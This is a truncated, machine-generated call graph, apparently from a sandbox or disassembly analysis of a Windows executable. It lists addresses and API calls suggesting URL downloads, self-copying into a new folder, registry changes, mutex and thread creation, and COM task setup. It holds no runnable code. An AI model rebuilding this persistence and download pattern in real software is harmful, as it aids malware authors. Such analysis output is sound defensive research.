4287e3 GetStartupInfoW 44739->44740 44741 428783 ___lock_fhandle @_EH4_CallFilterFunc@8 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___crtGetEnvironmentStringsW 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44761 428cde __malloc_crt 58 API calls 44760->44761 44762 431fd8 _wparse_cmdline 44760->44762 44761->44762 44762->44693 44764 4321ba __wsetlocale_set_cat 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 __wsetlocale_set_cat 44765->44773 44766 43223a 45124 420bed 58 API calls 2 library calls 44766->45124 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45125 420bed 58 API calls 2 library calls 44770->45125 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45123 42962f 58 API calls __openfile 44773->45123 45126 4242fd 8 API calls 2 library calls 44774->45126 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45127 43aeb5 44779->45127 44780 427c92 __initterm_e 44782 427cb1 __cinit __IsNonwritableInCurrentImage 44780->44782 45130 4219ac 67 API calls __cinit 44780->45130 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45131 40cf10 44784->45131 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45355 4124e0 109 API calls _memset 44788->45355 44789->44790 45145 41d3c0 44790->45145 44793 419fb9 44793->44705 44795 41a022 45148 41d340 44795->45148 44796 41b669 45436 44f23e 59 API calls 2 library calls 44796->45436 44798 41b673 45437 44f23e 59 API calls 2 library calls 44798->45437 44803 41a065 45153 413a90 44803->45153 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45209 412220 44810->45209 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45224 40ef50 44814->45224 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45229 413ea0 44819->45229 44821 420235 60 API calls _W_store_winword 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45169 423c92 44824->45169 44827 41a563 44825->44827 44860 41a5db 44827->44860 45250 414690 44827->45250 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45172 411cd0 44831->45172 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45357 411a10 8 API calls 44833->45357 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45356 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45356 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45273 40d240 CoInitialize 44844->45273 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 44861 420c62 _malloc 58 API calls 44859->44861 44860->44833 44860->44838 44860->44841 44860->44848 44864 41a810 _memset 44861->44864 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45359 40e760 95 API calls 44872->45359 45358 413ff0 59 API calls ___crtGetEnvironmentStringsW 44873->45358 44874->44846 44878 41a7d0 44874->44878 45723 41dbd0 95 API calls 4 library calls 44874->45723 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45724 41e690 203 API calls 8 library calls 44877->45724 44878->44846 45360 415c10 44879->45360 44881 41a98c 45375 412840 60 API calls 44881->45375 44883 41a997 45376 410fc0 93 API calls 4 library calls 44883->45376 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45377 412840 60 API calls 44890->45377 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45378 413ff0 59 API calls ___crtGetEnvironmentStringsW 44900->45378 44902 41ab1d 45379 412900 44902->45379 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45384 413ff0 59 API calls ___crtGetEnvironmentStringsW 44908->45384 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45385 413ff0 59 API calls ___crtGetEnvironmentStringsW 44916->45385 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45386 413580 59 API calls 44921->45386 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45387 413580 59 API calls 44926->45387 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45388 413580 59 API calls 44930->45388 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45389 413580 59 API calls 44934->45389 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45390 413580 59 API calls 44938->45390 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45391 413580 59 API calls 44942->45391 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45392 413580 59 API calls 44946->45392 44948 41afe0 45393 413100 59 API calls 44948->45393 44950 41b001 45394 413580 59 API calls 44950->45394 44952 41b025 45395 413100 59 API calls 44952->45395 44954 41b03c 45396 413580 59 API calls 44954->45396 44956 41b059 45397 413100 59 API calls 44956->45397 44958 41b070 45398 413580 59 API calls 44958->45398 44960 41b07c 45399 413100 59 API calls 44960->45399 44962 41b093 45400 413580 59 API calls 44962->45400 44964 41b09f 45401 413100 59 API calls 44964->45401 44966 41b0b6 45402 413580 59 API calls 44966->45402 44968 41b0c2 45403 413100 59 API calls 44968->45403 44970 41b0d9 45404 413580 59 API calls 44970->45404 44972 41b0e5 45405 413100 59 API calls 44972->45405 44974 41b0fc 45406 413580 59 API calls 44974->45406 44976 41b108 44978 41b130 44976->44978 45407 41cdd0 59 API calls 44976->45407 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45408 412de0 59 API calls 44980->45408 44983 41b1c9 44982->44983 45409 412c40 44983->45409 44985 41b1d8 45416 412bf0 59 API calls 44985->45416 44987 41b1ea 45417 40ecb0 60 API calls 2 library calls 44987->45417 44989 41b2f5 45420 4136c0 59 API calls 44989->45420 44991 41b308 45421 40ca70 59 API calls 44991->45421 44993 41b311 45422 4130b0 59 API calls 44993->45422 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45423 40c740 120 API calls 4 library calls 44996->45423 44998 412900 60 API calls 44998->45010 44999 41b327 45424 4111c0 169 API calls 2 library calls 44999->45424 45002 41b33b 45425 41ba10 LoadCursorW RegisterClassExW 45002->45425 45004 41b343 45426 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45426 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45427 410a50 65 API calls 45007->45427 45010->44989 45010->44995 45010->44998 45010->45005 45418 413580 59 API calls 45010->45418 45419 40f1f0 59 API calls 45010->45419 45011->44884 45012 41b379 45428 413100 59 API calls 45012->45428 45014 41b3a5 45429 413580 59 API calls 45014->45429 45016 41b48b 45435 41fdc0 CreateThread 45016->45435 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45430 41c330 59 API calls 45038->45430 45431 41c240 59 API calls 45038->45431 45432 41b8b0 59 API calls 45038->45432 45433 413260 59 API calls 45038->45433 45434 41fa10 CreateThread 45038->45434 45725 427e0e 45039->45725 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 9 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45087 428cec 45085->45087 45088 428d1e 45087->45088 45090 428cff 45087->45090 45091 420c62 45087->45091 45088->44757 45090->45087 45090->45088 45108 4329c9 Sleep 45090->45108 45092 420cdd 45091->45092 45100 420c6e 45091->45100 45117 42793d DecodePointer 45092->45117 45094 420ce3 45118 425208 58 API calls __getptd_noexit 45094->45118 45097 420ca1 RtlAllocateHeap 45097->45100 45107 420cd5 45097->45107 45099 420cc9 45115 425208 58 API calls __getptd_noexit 45099->45115 45100->45097 45100->45099 45104 420cc7 45100->45104 45105 420c79 45100->45105 45114 42793d DecodePointer 45100->45114 45116 425208 58 API calls __getptd_noexit 45104->45116 45105->45100 45109 427f51 58 API calls 2 library calls 45105->45109 45110 427fae 58 API calls 6 library calls 45105->45110 45111 427b0b 45105->45111 45107->45087 45108->45090 45109->45105 45110->45105 45119 427ad7 GetModuleHandleExW 45111->45119 45114->45100 45115->45104 45116->45107 45117->45094 45118->45107 45120 427af0 GetProcAddress 45119->45120 45121 427b07 ExitProcess 45119->45121 45120->45121 45122 427b02 45120->45122 45122->45121 45123->44773 45124->44768 45125->44768 45126->44776 45128 43aeb8 EncodePointer 45127->45128 45128->45128 45129 43aed2 45128->45129 45129->44780 45130->44782 45132 40cf32 _memset __ftell_nolock 45131->45132 45133 40cf4f InternetOpenW 45132->45133 45134 415c10 59 API calls 45133->45134 45135 40cf8a InternetOpenUrlW 45134->45135 45136 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45135->45136 45142 40cfb2 45135->45142 45438 4156d0 45136->45438 45138 4156d0 59 API calls 45140 40d049 45138->45140 45139 40d000 45139->45138 45140->45142 45457 413010 59 API calls 45140->45457 45142->44786 45143 40d084 45143->45142 45458 413010 59 API calls 45143->45458 45463 41ccc0 45145->45463 45483 41cc50 45148->45483 45151 41a04d 45151->44798 45151->44803 45154 413ab2 45153->45154 45162 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45153->45162 45155 413b00 45154->45155 45156 413aba 45154->45156 45491 44f23e 59 API calls 2 library calls 45155->45491 45157 423b4c 59 API calls 45156->45157 45159 413ac7 45157->45159 45159->45162 45492 44f1bb 59 API calls 3 library calls 45159->45492 45163 418400 45162->45163 45164 418437 45163->45164 45168 418446 45163->45168 45164->45168 45493 415d50 59 API calls ___crtGetEnvironmentStringsW 45164->45493 45165 4184b9 45165->44811 45168->45165 45494 418d50 59 API calls 45168->45494 45495 431781 45169->45495 45513 42f7c0 45172->45513 45175 411d20 _memset 45176 411d40 RegQueryValueExW RegCloseKey 45175->45176 45177 411d8f 45176->45177 45177->45177 45178 415c10 59 API calls 45177->45178 45179 411dbf 45178->45179 45180 411dd1 lstrlenA 45179->45180 45181 411e7c 45179->45181 45515 413520 59 API calls 45180->45515 45182 411e94 6 API calls 45181->45182 45185 411ef5 UuidCreate UuidToStringW 45182->45185 45184 411df1 45186 411e3c PathFileExistsW 45184->45186 45187 411e00 45184->45187 45188 411f36 45185->45188 45186->45181 45189 411e52 45186->45189 45187->45184 45187->45186 45188->45188 45191 415c10 59 API calls 45188->45191 45190 411e6a 45189->45190 45193 414690 59 API calls 45189->45193 45199 4121d1 45190->45199 45192 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45191->45192 45194 411f98 45192->45194 45196 411fce 45192->45196 45193->45190 45195 415c10 59 API calls 45194->45195 45195->45196 45197 415c10 59 API calls 45196->45197 45198 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45197->45198 45198->45199 45200 41207c _memset 45198->45200 45199->44840 45201 412095 6 API calls 45200->45201 45202 412115 _memset 45201->45202 45203 412109 45201->45203 45205 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45202->45205 45516 413260 59 API calls 45203->45516 45206 4121b2 45205->45206 45207 4121aa GetLastError 45205->45207 45208 4121c0 WaitForSingleObject 45206->45208 45207->45199 45208->45199 45208->45208 45210 42f7c0 __ftell_nolock 45209->45210 45211 41222d 7 API calls 45210->45211 45212 4122bd K32EnumProcesses 45211->45212 45213 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45211->45213 45214 4122d3 45212->45214 45216 4122df 45212->45216 45213->45212 45214->44814 45215 412353 45215->44814 45216->45215 45217 4122f0 OpenProcess 45216->45217 45218 412346 CloseHandle 45217->45218 45219 41230a K32EnumProcessModules 45217->45219 45218->45215 45218->45217 45219->45218 45220 41231c K32GetModuleBaseNameW 45219->45220 45517 420235 45220->45517 45222 41233e 45222->45218 45223 412345 45222->45223 45223->45218 45225 420c62 _malloc 58 API calls 45224->45225 45228 40ef6e _memset 45225->45228 45226 40efdc 45226->44819 45227 420c62 _malloc 58 API calls 45227->45228 45228->45226 45228->45227 45228->45228 45230 413f05 45229->45230 45234 413eae 45229->45234 45231 413fb1 45230->45231 45232 413f18 45230->45232 45533 44f23e 59 API calls 2 library calls 45231->45533 45235 413fbb 45232->45235 45236 413f2d 45232->45236 45237 413f3d ___crtGetEnvironmentStringsW 45232->45237 45234->45230 45241 413ed4 45234->45241 45534 44f23e 59 API calls 2 library calls 45235->45534 45236->45237 45532 416760 59 API calls 2 library calls 45236->45532 45237->44819 45243 413ed9 45241->45243 45244 413eef 45241->45244 45530 413da0 59 API calls ___crtGetEnvironmentStringsW 45243->45530 45531 413da0 59 API calls ___crtGetEnvironmentStringsW 45244->45531 45248 413ee9 45248->44819 45249 413eff 45249->44819 45251 4146a9 45250->45251 45252 41478c 45250->45252 45253 4146b6 45251->45253 45254 4146e9 45251->45254 45537 44f26c 59 API calls 3 library calls 45252->45537 45256 4146c2 45253->45256 45257 414796 45253->45257 45258 4147a0 45254->45258 45259 4146f5 45254->45259 45535 413340 59 API calls _memmove 45256->45535 45538 44f26c 59 API calls 3 library calls 45257->45538 45539 44f23e 59 API calls 2 library calls 45258->45539 45271 414707 ___crtGetEnvironmentStringsW 45259->45271 45536 416950 59 API calls 2 library calls 45259->45536 45267 4146e0 45267->44834 45271->44834 45274 40d27d CoInitializeSecurity 45273->45274 45280 40d276 45273->45280 45275 414690 59 API calls 45274->45275 45276 40d2b8 CoCreateInstance 45275->45276 45277 40d2e3 VariantInit VariantInit VariantInit VariantInit 45276->45277 45278 40da3c CoUninitialize 45276->45278 45279 40d38e VariantClear VariantClear VariantClear VariantClear 45277->45279 45278->45280 45281 40d3e2 45279->45281 45282 40d3cc CoUninitialize 45279->45282 45280->44860 45540 40b140 45281->45540 45282->45280 45285 40d3f6 45545 40b1d0 45285->45545 45287 40d422 45288 40d426 CoUninitialize 45287->45288 45289 40d43c 45287->45289 45288->45280 45290 40b140 60 API calls 45289->45290 45292 40d449 45290->45292 45293 40b1d0 SysFreeString 45292->45293 45294 40d471 45293->45294 45295 40d496 CoUninitialize 45294->45295 45296 40d4ac 45294->45296 45295->45280 45298 40b140 60 API calls 45296->45298 45353 40d8cf 45296->45353 45299 40d4d5 45298->45299 45300 40b1d0 SysFreeString 45299->45300 45301 40d4fd 45300->45301 45302 40b140 60 API calls 45301->45302 45301->45353 45303 40d5ae 45302->45303 45304 40b1d0 SysFreeString 45303->45304 45305 40d5d6 45304->45305 45306 40b140 60 API calls 45305->45306 45305->45353 45307 40d679 45306->45307 45308 40b1d0 SysFreeString 45307->45308 45309 40d6a1 45308->45309 45310 40b140 60 API calls 45309->45310 45309->45353 45311 40d6b6 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d6de 45312->45313 45314 40b140 60 API calls 45313->45314 45313->45353 45315 40d707 45314->45315 45316 40b1d0 SysFreeString 45315->45316 45317 40d72f 45316->45317 45318 40b140 60 API calls 45317->45318 45317->45353 45319 40d744 45318->45319 45320 40b1d0 SysFreeString 45319->45320 45321 40d76c 45320->45321 45321->45353 45549 423aaf GetSystemTimeAsFileTime 45321->45549 45323 40d77d 45551 423551 45323->45551 45328 412c40 59 API calls 45329 40d7b5 45328->45329 45330 412900 60 API calls 45329->45330 45331 40d7c3 45330->45331 45332 40b140 60 API calls 45331->45332 45333 40d7db 45332->45333 45334 40b1d0 SysFreeString 45333->45334 45335 40d7ff 45334->45335 45336 40b140 60 API calls 45335->45336 45335->45353 45337 40d8a3 45336->45337 45338 40b1d0 SysFreeString 45337->45338 45339 40d8cb 45338->45339 45340 40b140 60 API calls 45339->45340 45339->45353 45341 40d8ea 45340->45341 45342 40b1d0 SysFreeString 45341->45342 45343 40d912 45342->45343 45343->45353 45559 40b400 SysAllocString 45343->45559 45345 40d936 VariantInit VariantInit 45346 40b140 60 API calls 45345->45346 45347 40d985 45346->45347 45348 40b1d0 SysFreeString 45347->45348 45349 40d9e7 VariantClear VariantClear VariantClear 45348->45349 45350 40da10 45349->45350 45351 40da46 CoUninitialize 45349->45351 45563 42052a 78 API calls swprintf 45350->45563 45351->45280 45353->45278 45355->44793 45356->44837 45357->44838 45358->44874 45359->44877 45361 415c66 45360->45361 45366 415c1e 45360->45366 45362 415c76 45361->45362 45363 415cff 45361->45363 45370 415c88 ___crtGetEnvironmentStringsW 45362->45370 45719 416950 59 API calls 2 library calls 45362->45719 45720 44f23e 59 API calls 2 library calls 45363->45720 45366->45361 45371 415c45 45366->45371 45370->44881 45373 414690 59 API calls 45371->45373 45374 415c60 45373->45374 45374->44881 45375->44883 45376->44886 45377->44892 45378->44902 45380 413a90 59 API calls 45379->45380 45381 41294c MultiByteToWideChar 45380->45381 45382 418400 59 API calls 45381->45382 45383 41298d 45382->45383 45383->44905 45384->44910 45385->44918 45386->44924 45387->44928 45388->44932 45389->44936 45390->44940 45391->44944 45392->44948 45393->44950 45394->44952 45395->44954 45396->44956 45397->44958 45398->44960 45399->44962 45400->44964 45401->44966 45402->44968 45403->44970 45404->44972 45405->44974 45406->44976 45407->44978 45408->44980 45410 412c71 45409->45410 45411 412c5f 45409->45411 45414 4156d0 59 API calls 45410->45414 45412 4156d0 59 API calls 45411->45412 45413 412c6a 45412->45413 45413->44985 45415 412c8a 45414->45415 45415->44985 45416->44987 45417->45010 45418->45010 45419->45010 45420->44991 45421->44993 45422->44996 45423->44999 45424->45002 45425->45004 45426->45007 45427->45012 45428->45014 45429->45038 45430->45038 45431->45038 45432->45038 45433->45038 45434->45038 45721 41f130 218 API calls _W_store_winword 45434->45721 45435->45018 45722 41fd80 64 API calls 45435->45722 45439 415735 45438->45439 45444 4156de 45438->45444 45440 4157bc 45439->45440 45441 41573e 45439->45441 45462 44f23e 59 API calls 2 library calls 45440->45462 45450 415750 ___crtGetEnvironmentStringsW 45441->45450 45461 416760 59 API calls 2 library calls 45441->45461 45444->45439 45448 415704 45444->45448 45451 415709 45448->45451 45452 41571f 45448->45452 45450->45139 45459 413ff0 59 API calls ___crtGetEnvironmentStringsW 45451->45459 45460 413ff0 59 API calls ___crtGetEnvironmentStringsW 45452->45460 45455 41572f 45455->45139 45456 415719 45456->45139 45457->45143 45458->45142 45459->45456 45460->45455 45461->45450 45469 423b4c 45463->45469 45465 41ccca 45468 41a00a 45465->45468 45479 44f1bb 59 API calls 3 library calls 45465->45479 45468->44795 45468->44796 45473 423b54 45469->45473 45470 420c62 _malloc 58 API calls 45470->45473 45471 423b6e 45471->45465 45473->45470 45473->45471 45474 423b72 std::exception::exception 45473->45474 45480 42793d DecodePointer 45473->45480 45481 430eca RaiseException 45474->45481 45476 423b9c 45482 430d91 58 API calls _free 45476->45482 45478 423bae 45478->45465 45480->45473 45481->45476 45482->45478 45484 423b4c 59 API calls 45483->45484 45485 41cc5d 45484->45485 45487 41cc64 45485->45487 45490 44f1bb 59 API calls 3 library calls 45485->45490 45487->45151 45489 41d740 59 API calls 45487->45489 45489->45151 45493->45168 45494->45168 45498 431570 45495->45498 45499 431580 45498->45499 45500 431586 45499->45500 45505 4315ae 45499->45505 45509 425208 58 API calls __getptd_noexit 45500->45509 45502 43158b 45510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45502->45510 45506 4315cf wcstoxl 45505->45506 45511 42e883 GetStringTypeW 45505->45511 45508 41a36e lstrcpyW lstrcpyW 45506->45508 45512 425208 58 API calls __getptd_noexit 45506->45512 45508->44829 45509->45502 45510->45508 45511->45505 45512->45508 45514 411cf2 RegOpenKeyExW 45513->45514 45514->45175 45514->45199 45515->45184 45516->45202 45518 420241 45517->45518 45519 4202b6 45517->45519 45522 420266 45518->45522 45527 425208 58 API calls __getptd_noexit 45518->45527 45529 4202c8 60 API calls 3 library calls 45519->45529 45521 4202c3 45521->45222 45522->45222 45524 42024d 45528 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45524->45528 45526 420258 45526->45222 45527->45524 45528->45526 45529->45521 45530->45248 45531->45249 45532->45237 45535->45267 45536->45271 45537->45257 45538->45258 45541 423b4c 59 API calls 45540->45541 45542 40b164 45541->45542 45543 40b177 SysAllocString 45542->45543 45544 40b194 45542->45544 45543->45544 45544->45285 45546 40b1de 45545->45546 45548 40b202 45545->45548 45547 40b1f5 SysFreeString 45546->45547 45546->45548 45547->45548 45548->45287 45550 423add __aulldiv 45549->45550 45550->45323 45564 43035d 45551->45564 45553 42355a 45555 40d78f 45553->45555 45572 423576 45553->45572 45556 4228e0 45555->45556 45674 42279f 45556->45674 45560 40b423 45559->45560 45561 40b41d 45559->45561 45562 40b42d VariantClear 45560->45562 45561->45345 45562->45345 45563->45353 45605 42501f 58 API calls 4 library calls 45564->45605 45566 430369 45569 43038d 45566->45569 45606 425208 58 API calls __getptd_noexit 45566->45606 45567 430363 45567->45566 45567->45569 45571 428cde __malloc_crt 58 API calls 45567->45571 45569->45553 45570 43036e 45570->45553 45571->45566 45573 423591 45572->45573 45574 4235a9 _memset 45572->45574 45615 425208 58 API calls __getptd_noexit 45573->45615 45574->45573 45581 4235c0 45574->45581 45576 423596 45616 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45576->45616 45578 4235cb 45617 425208 58 API calls __getptd_noexit 45578->45617 45579 4235e9 45607 42fb64 45579->45607 45581->45578 45581->45579 45583 4235ee 45618 42f803 58 API calls __openfile 45583->45618 45585 4235f7 45586 4237e5 45585->45586 45619 42f82d 58 API calls __openfile 45585->45619 45632 4242fd 8 API calls 2 library calls 45586->45632 45589 423609 45589->45586 45620 42f857 45589->45620 45590 4237ef 45592 42361b 45592->45586 45593 423624 45592->45593 45594 42369b 45593->45594 45596 423637 45593->45596 45630 42f939 58 API calls 4 library calls 45594->45630 45627 42f939 58 API calls 4 library calls 45596->45627 45597 4236a2 45604 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45597->45604 45631 42fbb4 58 API calls 4 library calls 45597->45631 45599 42364f 45599->45604 45628 42fbb4 58 API calls 4 library calls 45599->45628 45602 423668 45602->45604 45629 42f939 58 API calls 4 library calls 45602->45629 45604->45555 45605->45567 45606->45570 45608 42fb70 ___lock_fhandle 45607->45608 45609 42fba5 ___lock_fhandle 45608->45609 45610 428af7 __lock 58 API calls 45608->45610 45609->45583 45611 42fb80 45610->45611 45612 42fb93 45611->45612 45633 42fe47 45611->45633 45662 42fbab LeaveCriticalSection _doexit 45612->45662 45615->45576 45616->45604 45617->45604 45618->45585 45619->45589 45621 42f861 45620->45621 45622 42f876 45620->45622 45672 425208 58 API calls __getptd_noexit 45621->45672 45622->45592 45624 42f866 45673 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45624->45673 45626 42f871 45626->45592 45627->45599 45628->45602 45629->45604 45630->45597 45631->45604 45632->45590 45634 42fe53 ___lock_fhandle 45633->45634 45635 428af7 __lock 58 API calls 45634->45635 45636 42fe71 __tzset_nolock 45635->45636 45637 42f857 __tzset_nolock 58 API calls 45636->45637 45638 42fe86 45637->45638 45649 42ff25 __tzset_nolock 45638->45649 45663 42f803 58 API calls __openfile 45638->45663 45641 42fe98 45641->45649 45664 42f82d 58 API calls __openfile 45641->45664 45642 42ff71 GetTimeZoneInformation 45642->45649 45645 42feaa 45645->45649 45665 433f99 58 API calls 2 library calls 45645->45665 45646 42ffd8 WideCharToMultiByte 45646->45649 45648 42feb8 45666 441667 78 API calls 3 library calls 45648->45666 45649->45642 45649->45646 45650 430010 WideCharToMultiByte 45649->45650 45655 43ff8e 58 API calls ___getlocaleinfo 45649->45655 45660 423c2d 61 API calls UnDecorator::getTemplateConstant 45649->45660 45661 430157 ___lock_fhandle __tzset_nolock 45649->45661 45669 4242fd 8 API calls 2 library calls 45649->45669 45670 420bed 58 API calls 2 library calls 45649->45670 45671 4300d7 LeaveCriticalSection _doexit 45649->45671 45650->45649 45653 42ff0c _strlen 45656 428cde __malloc_crt 58 API calls 45653->45656 45654 42fed9 __tzset_nolock 45654->45649 45654->45653 45667 420bed 58 API calls 2 library calls 45654->45667 45655->45649 45658 42ff1a _strlen 45656->45658 45658->45649 45668 42c0fd 58 API calls __openfile 45658->45668 45660->45649 45661->45612 45662->45609 45663->45641 45664->45645 45665->45648 45666->45654 45667->45653 45668->45649 45669->45649 45670->45649 45671->45649 45672->45624 45673->45626 45701 42019c 45674->45701 45677 4227d4 45709 425208 58 API calls __getptd_noexit 45677->45709 45679 4227d9 45710 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45679->45710 45680 4227e9 MultiByteToWideChar 45682 422804 GetLastError 45680->45682 45683 422815 45680->45683 45711 4251e7 58 API calls 2 library calls 45682->45711 45686 428cde __malloc_crt 58 API calls 45683->45686 45684 40d7a3 45684->45328 45688 42281d 45686->45688 45687 422810 45714 420bed 58 API calls 2 library calls 45687->45714 45688->45687 45689 422825 MultiByteToWideChar 45688->45689 45689->45682 45691 42283f 45689->45691 45693 428cde __malloc_crt 58 API calls 45691->45693 45692 4228a0 45715 420bed 58 API calls 2 library calls 45692->45715 45695 42284a 45693->45695 45695->45687 45712 42d51e 88 API calls 3 library calls 45695->45712 45697 422866 45697->45687 45698 42286f WideCharToMultiByte 45697->45698 45698->45687 45699 42288b GetLastError 45698->45699 45713 4251e7 58 API calls 2 library calls 45699->45713 45702 4201ad 45701->45702 45708 4201fa 45701->45708 45716 425007 58 API 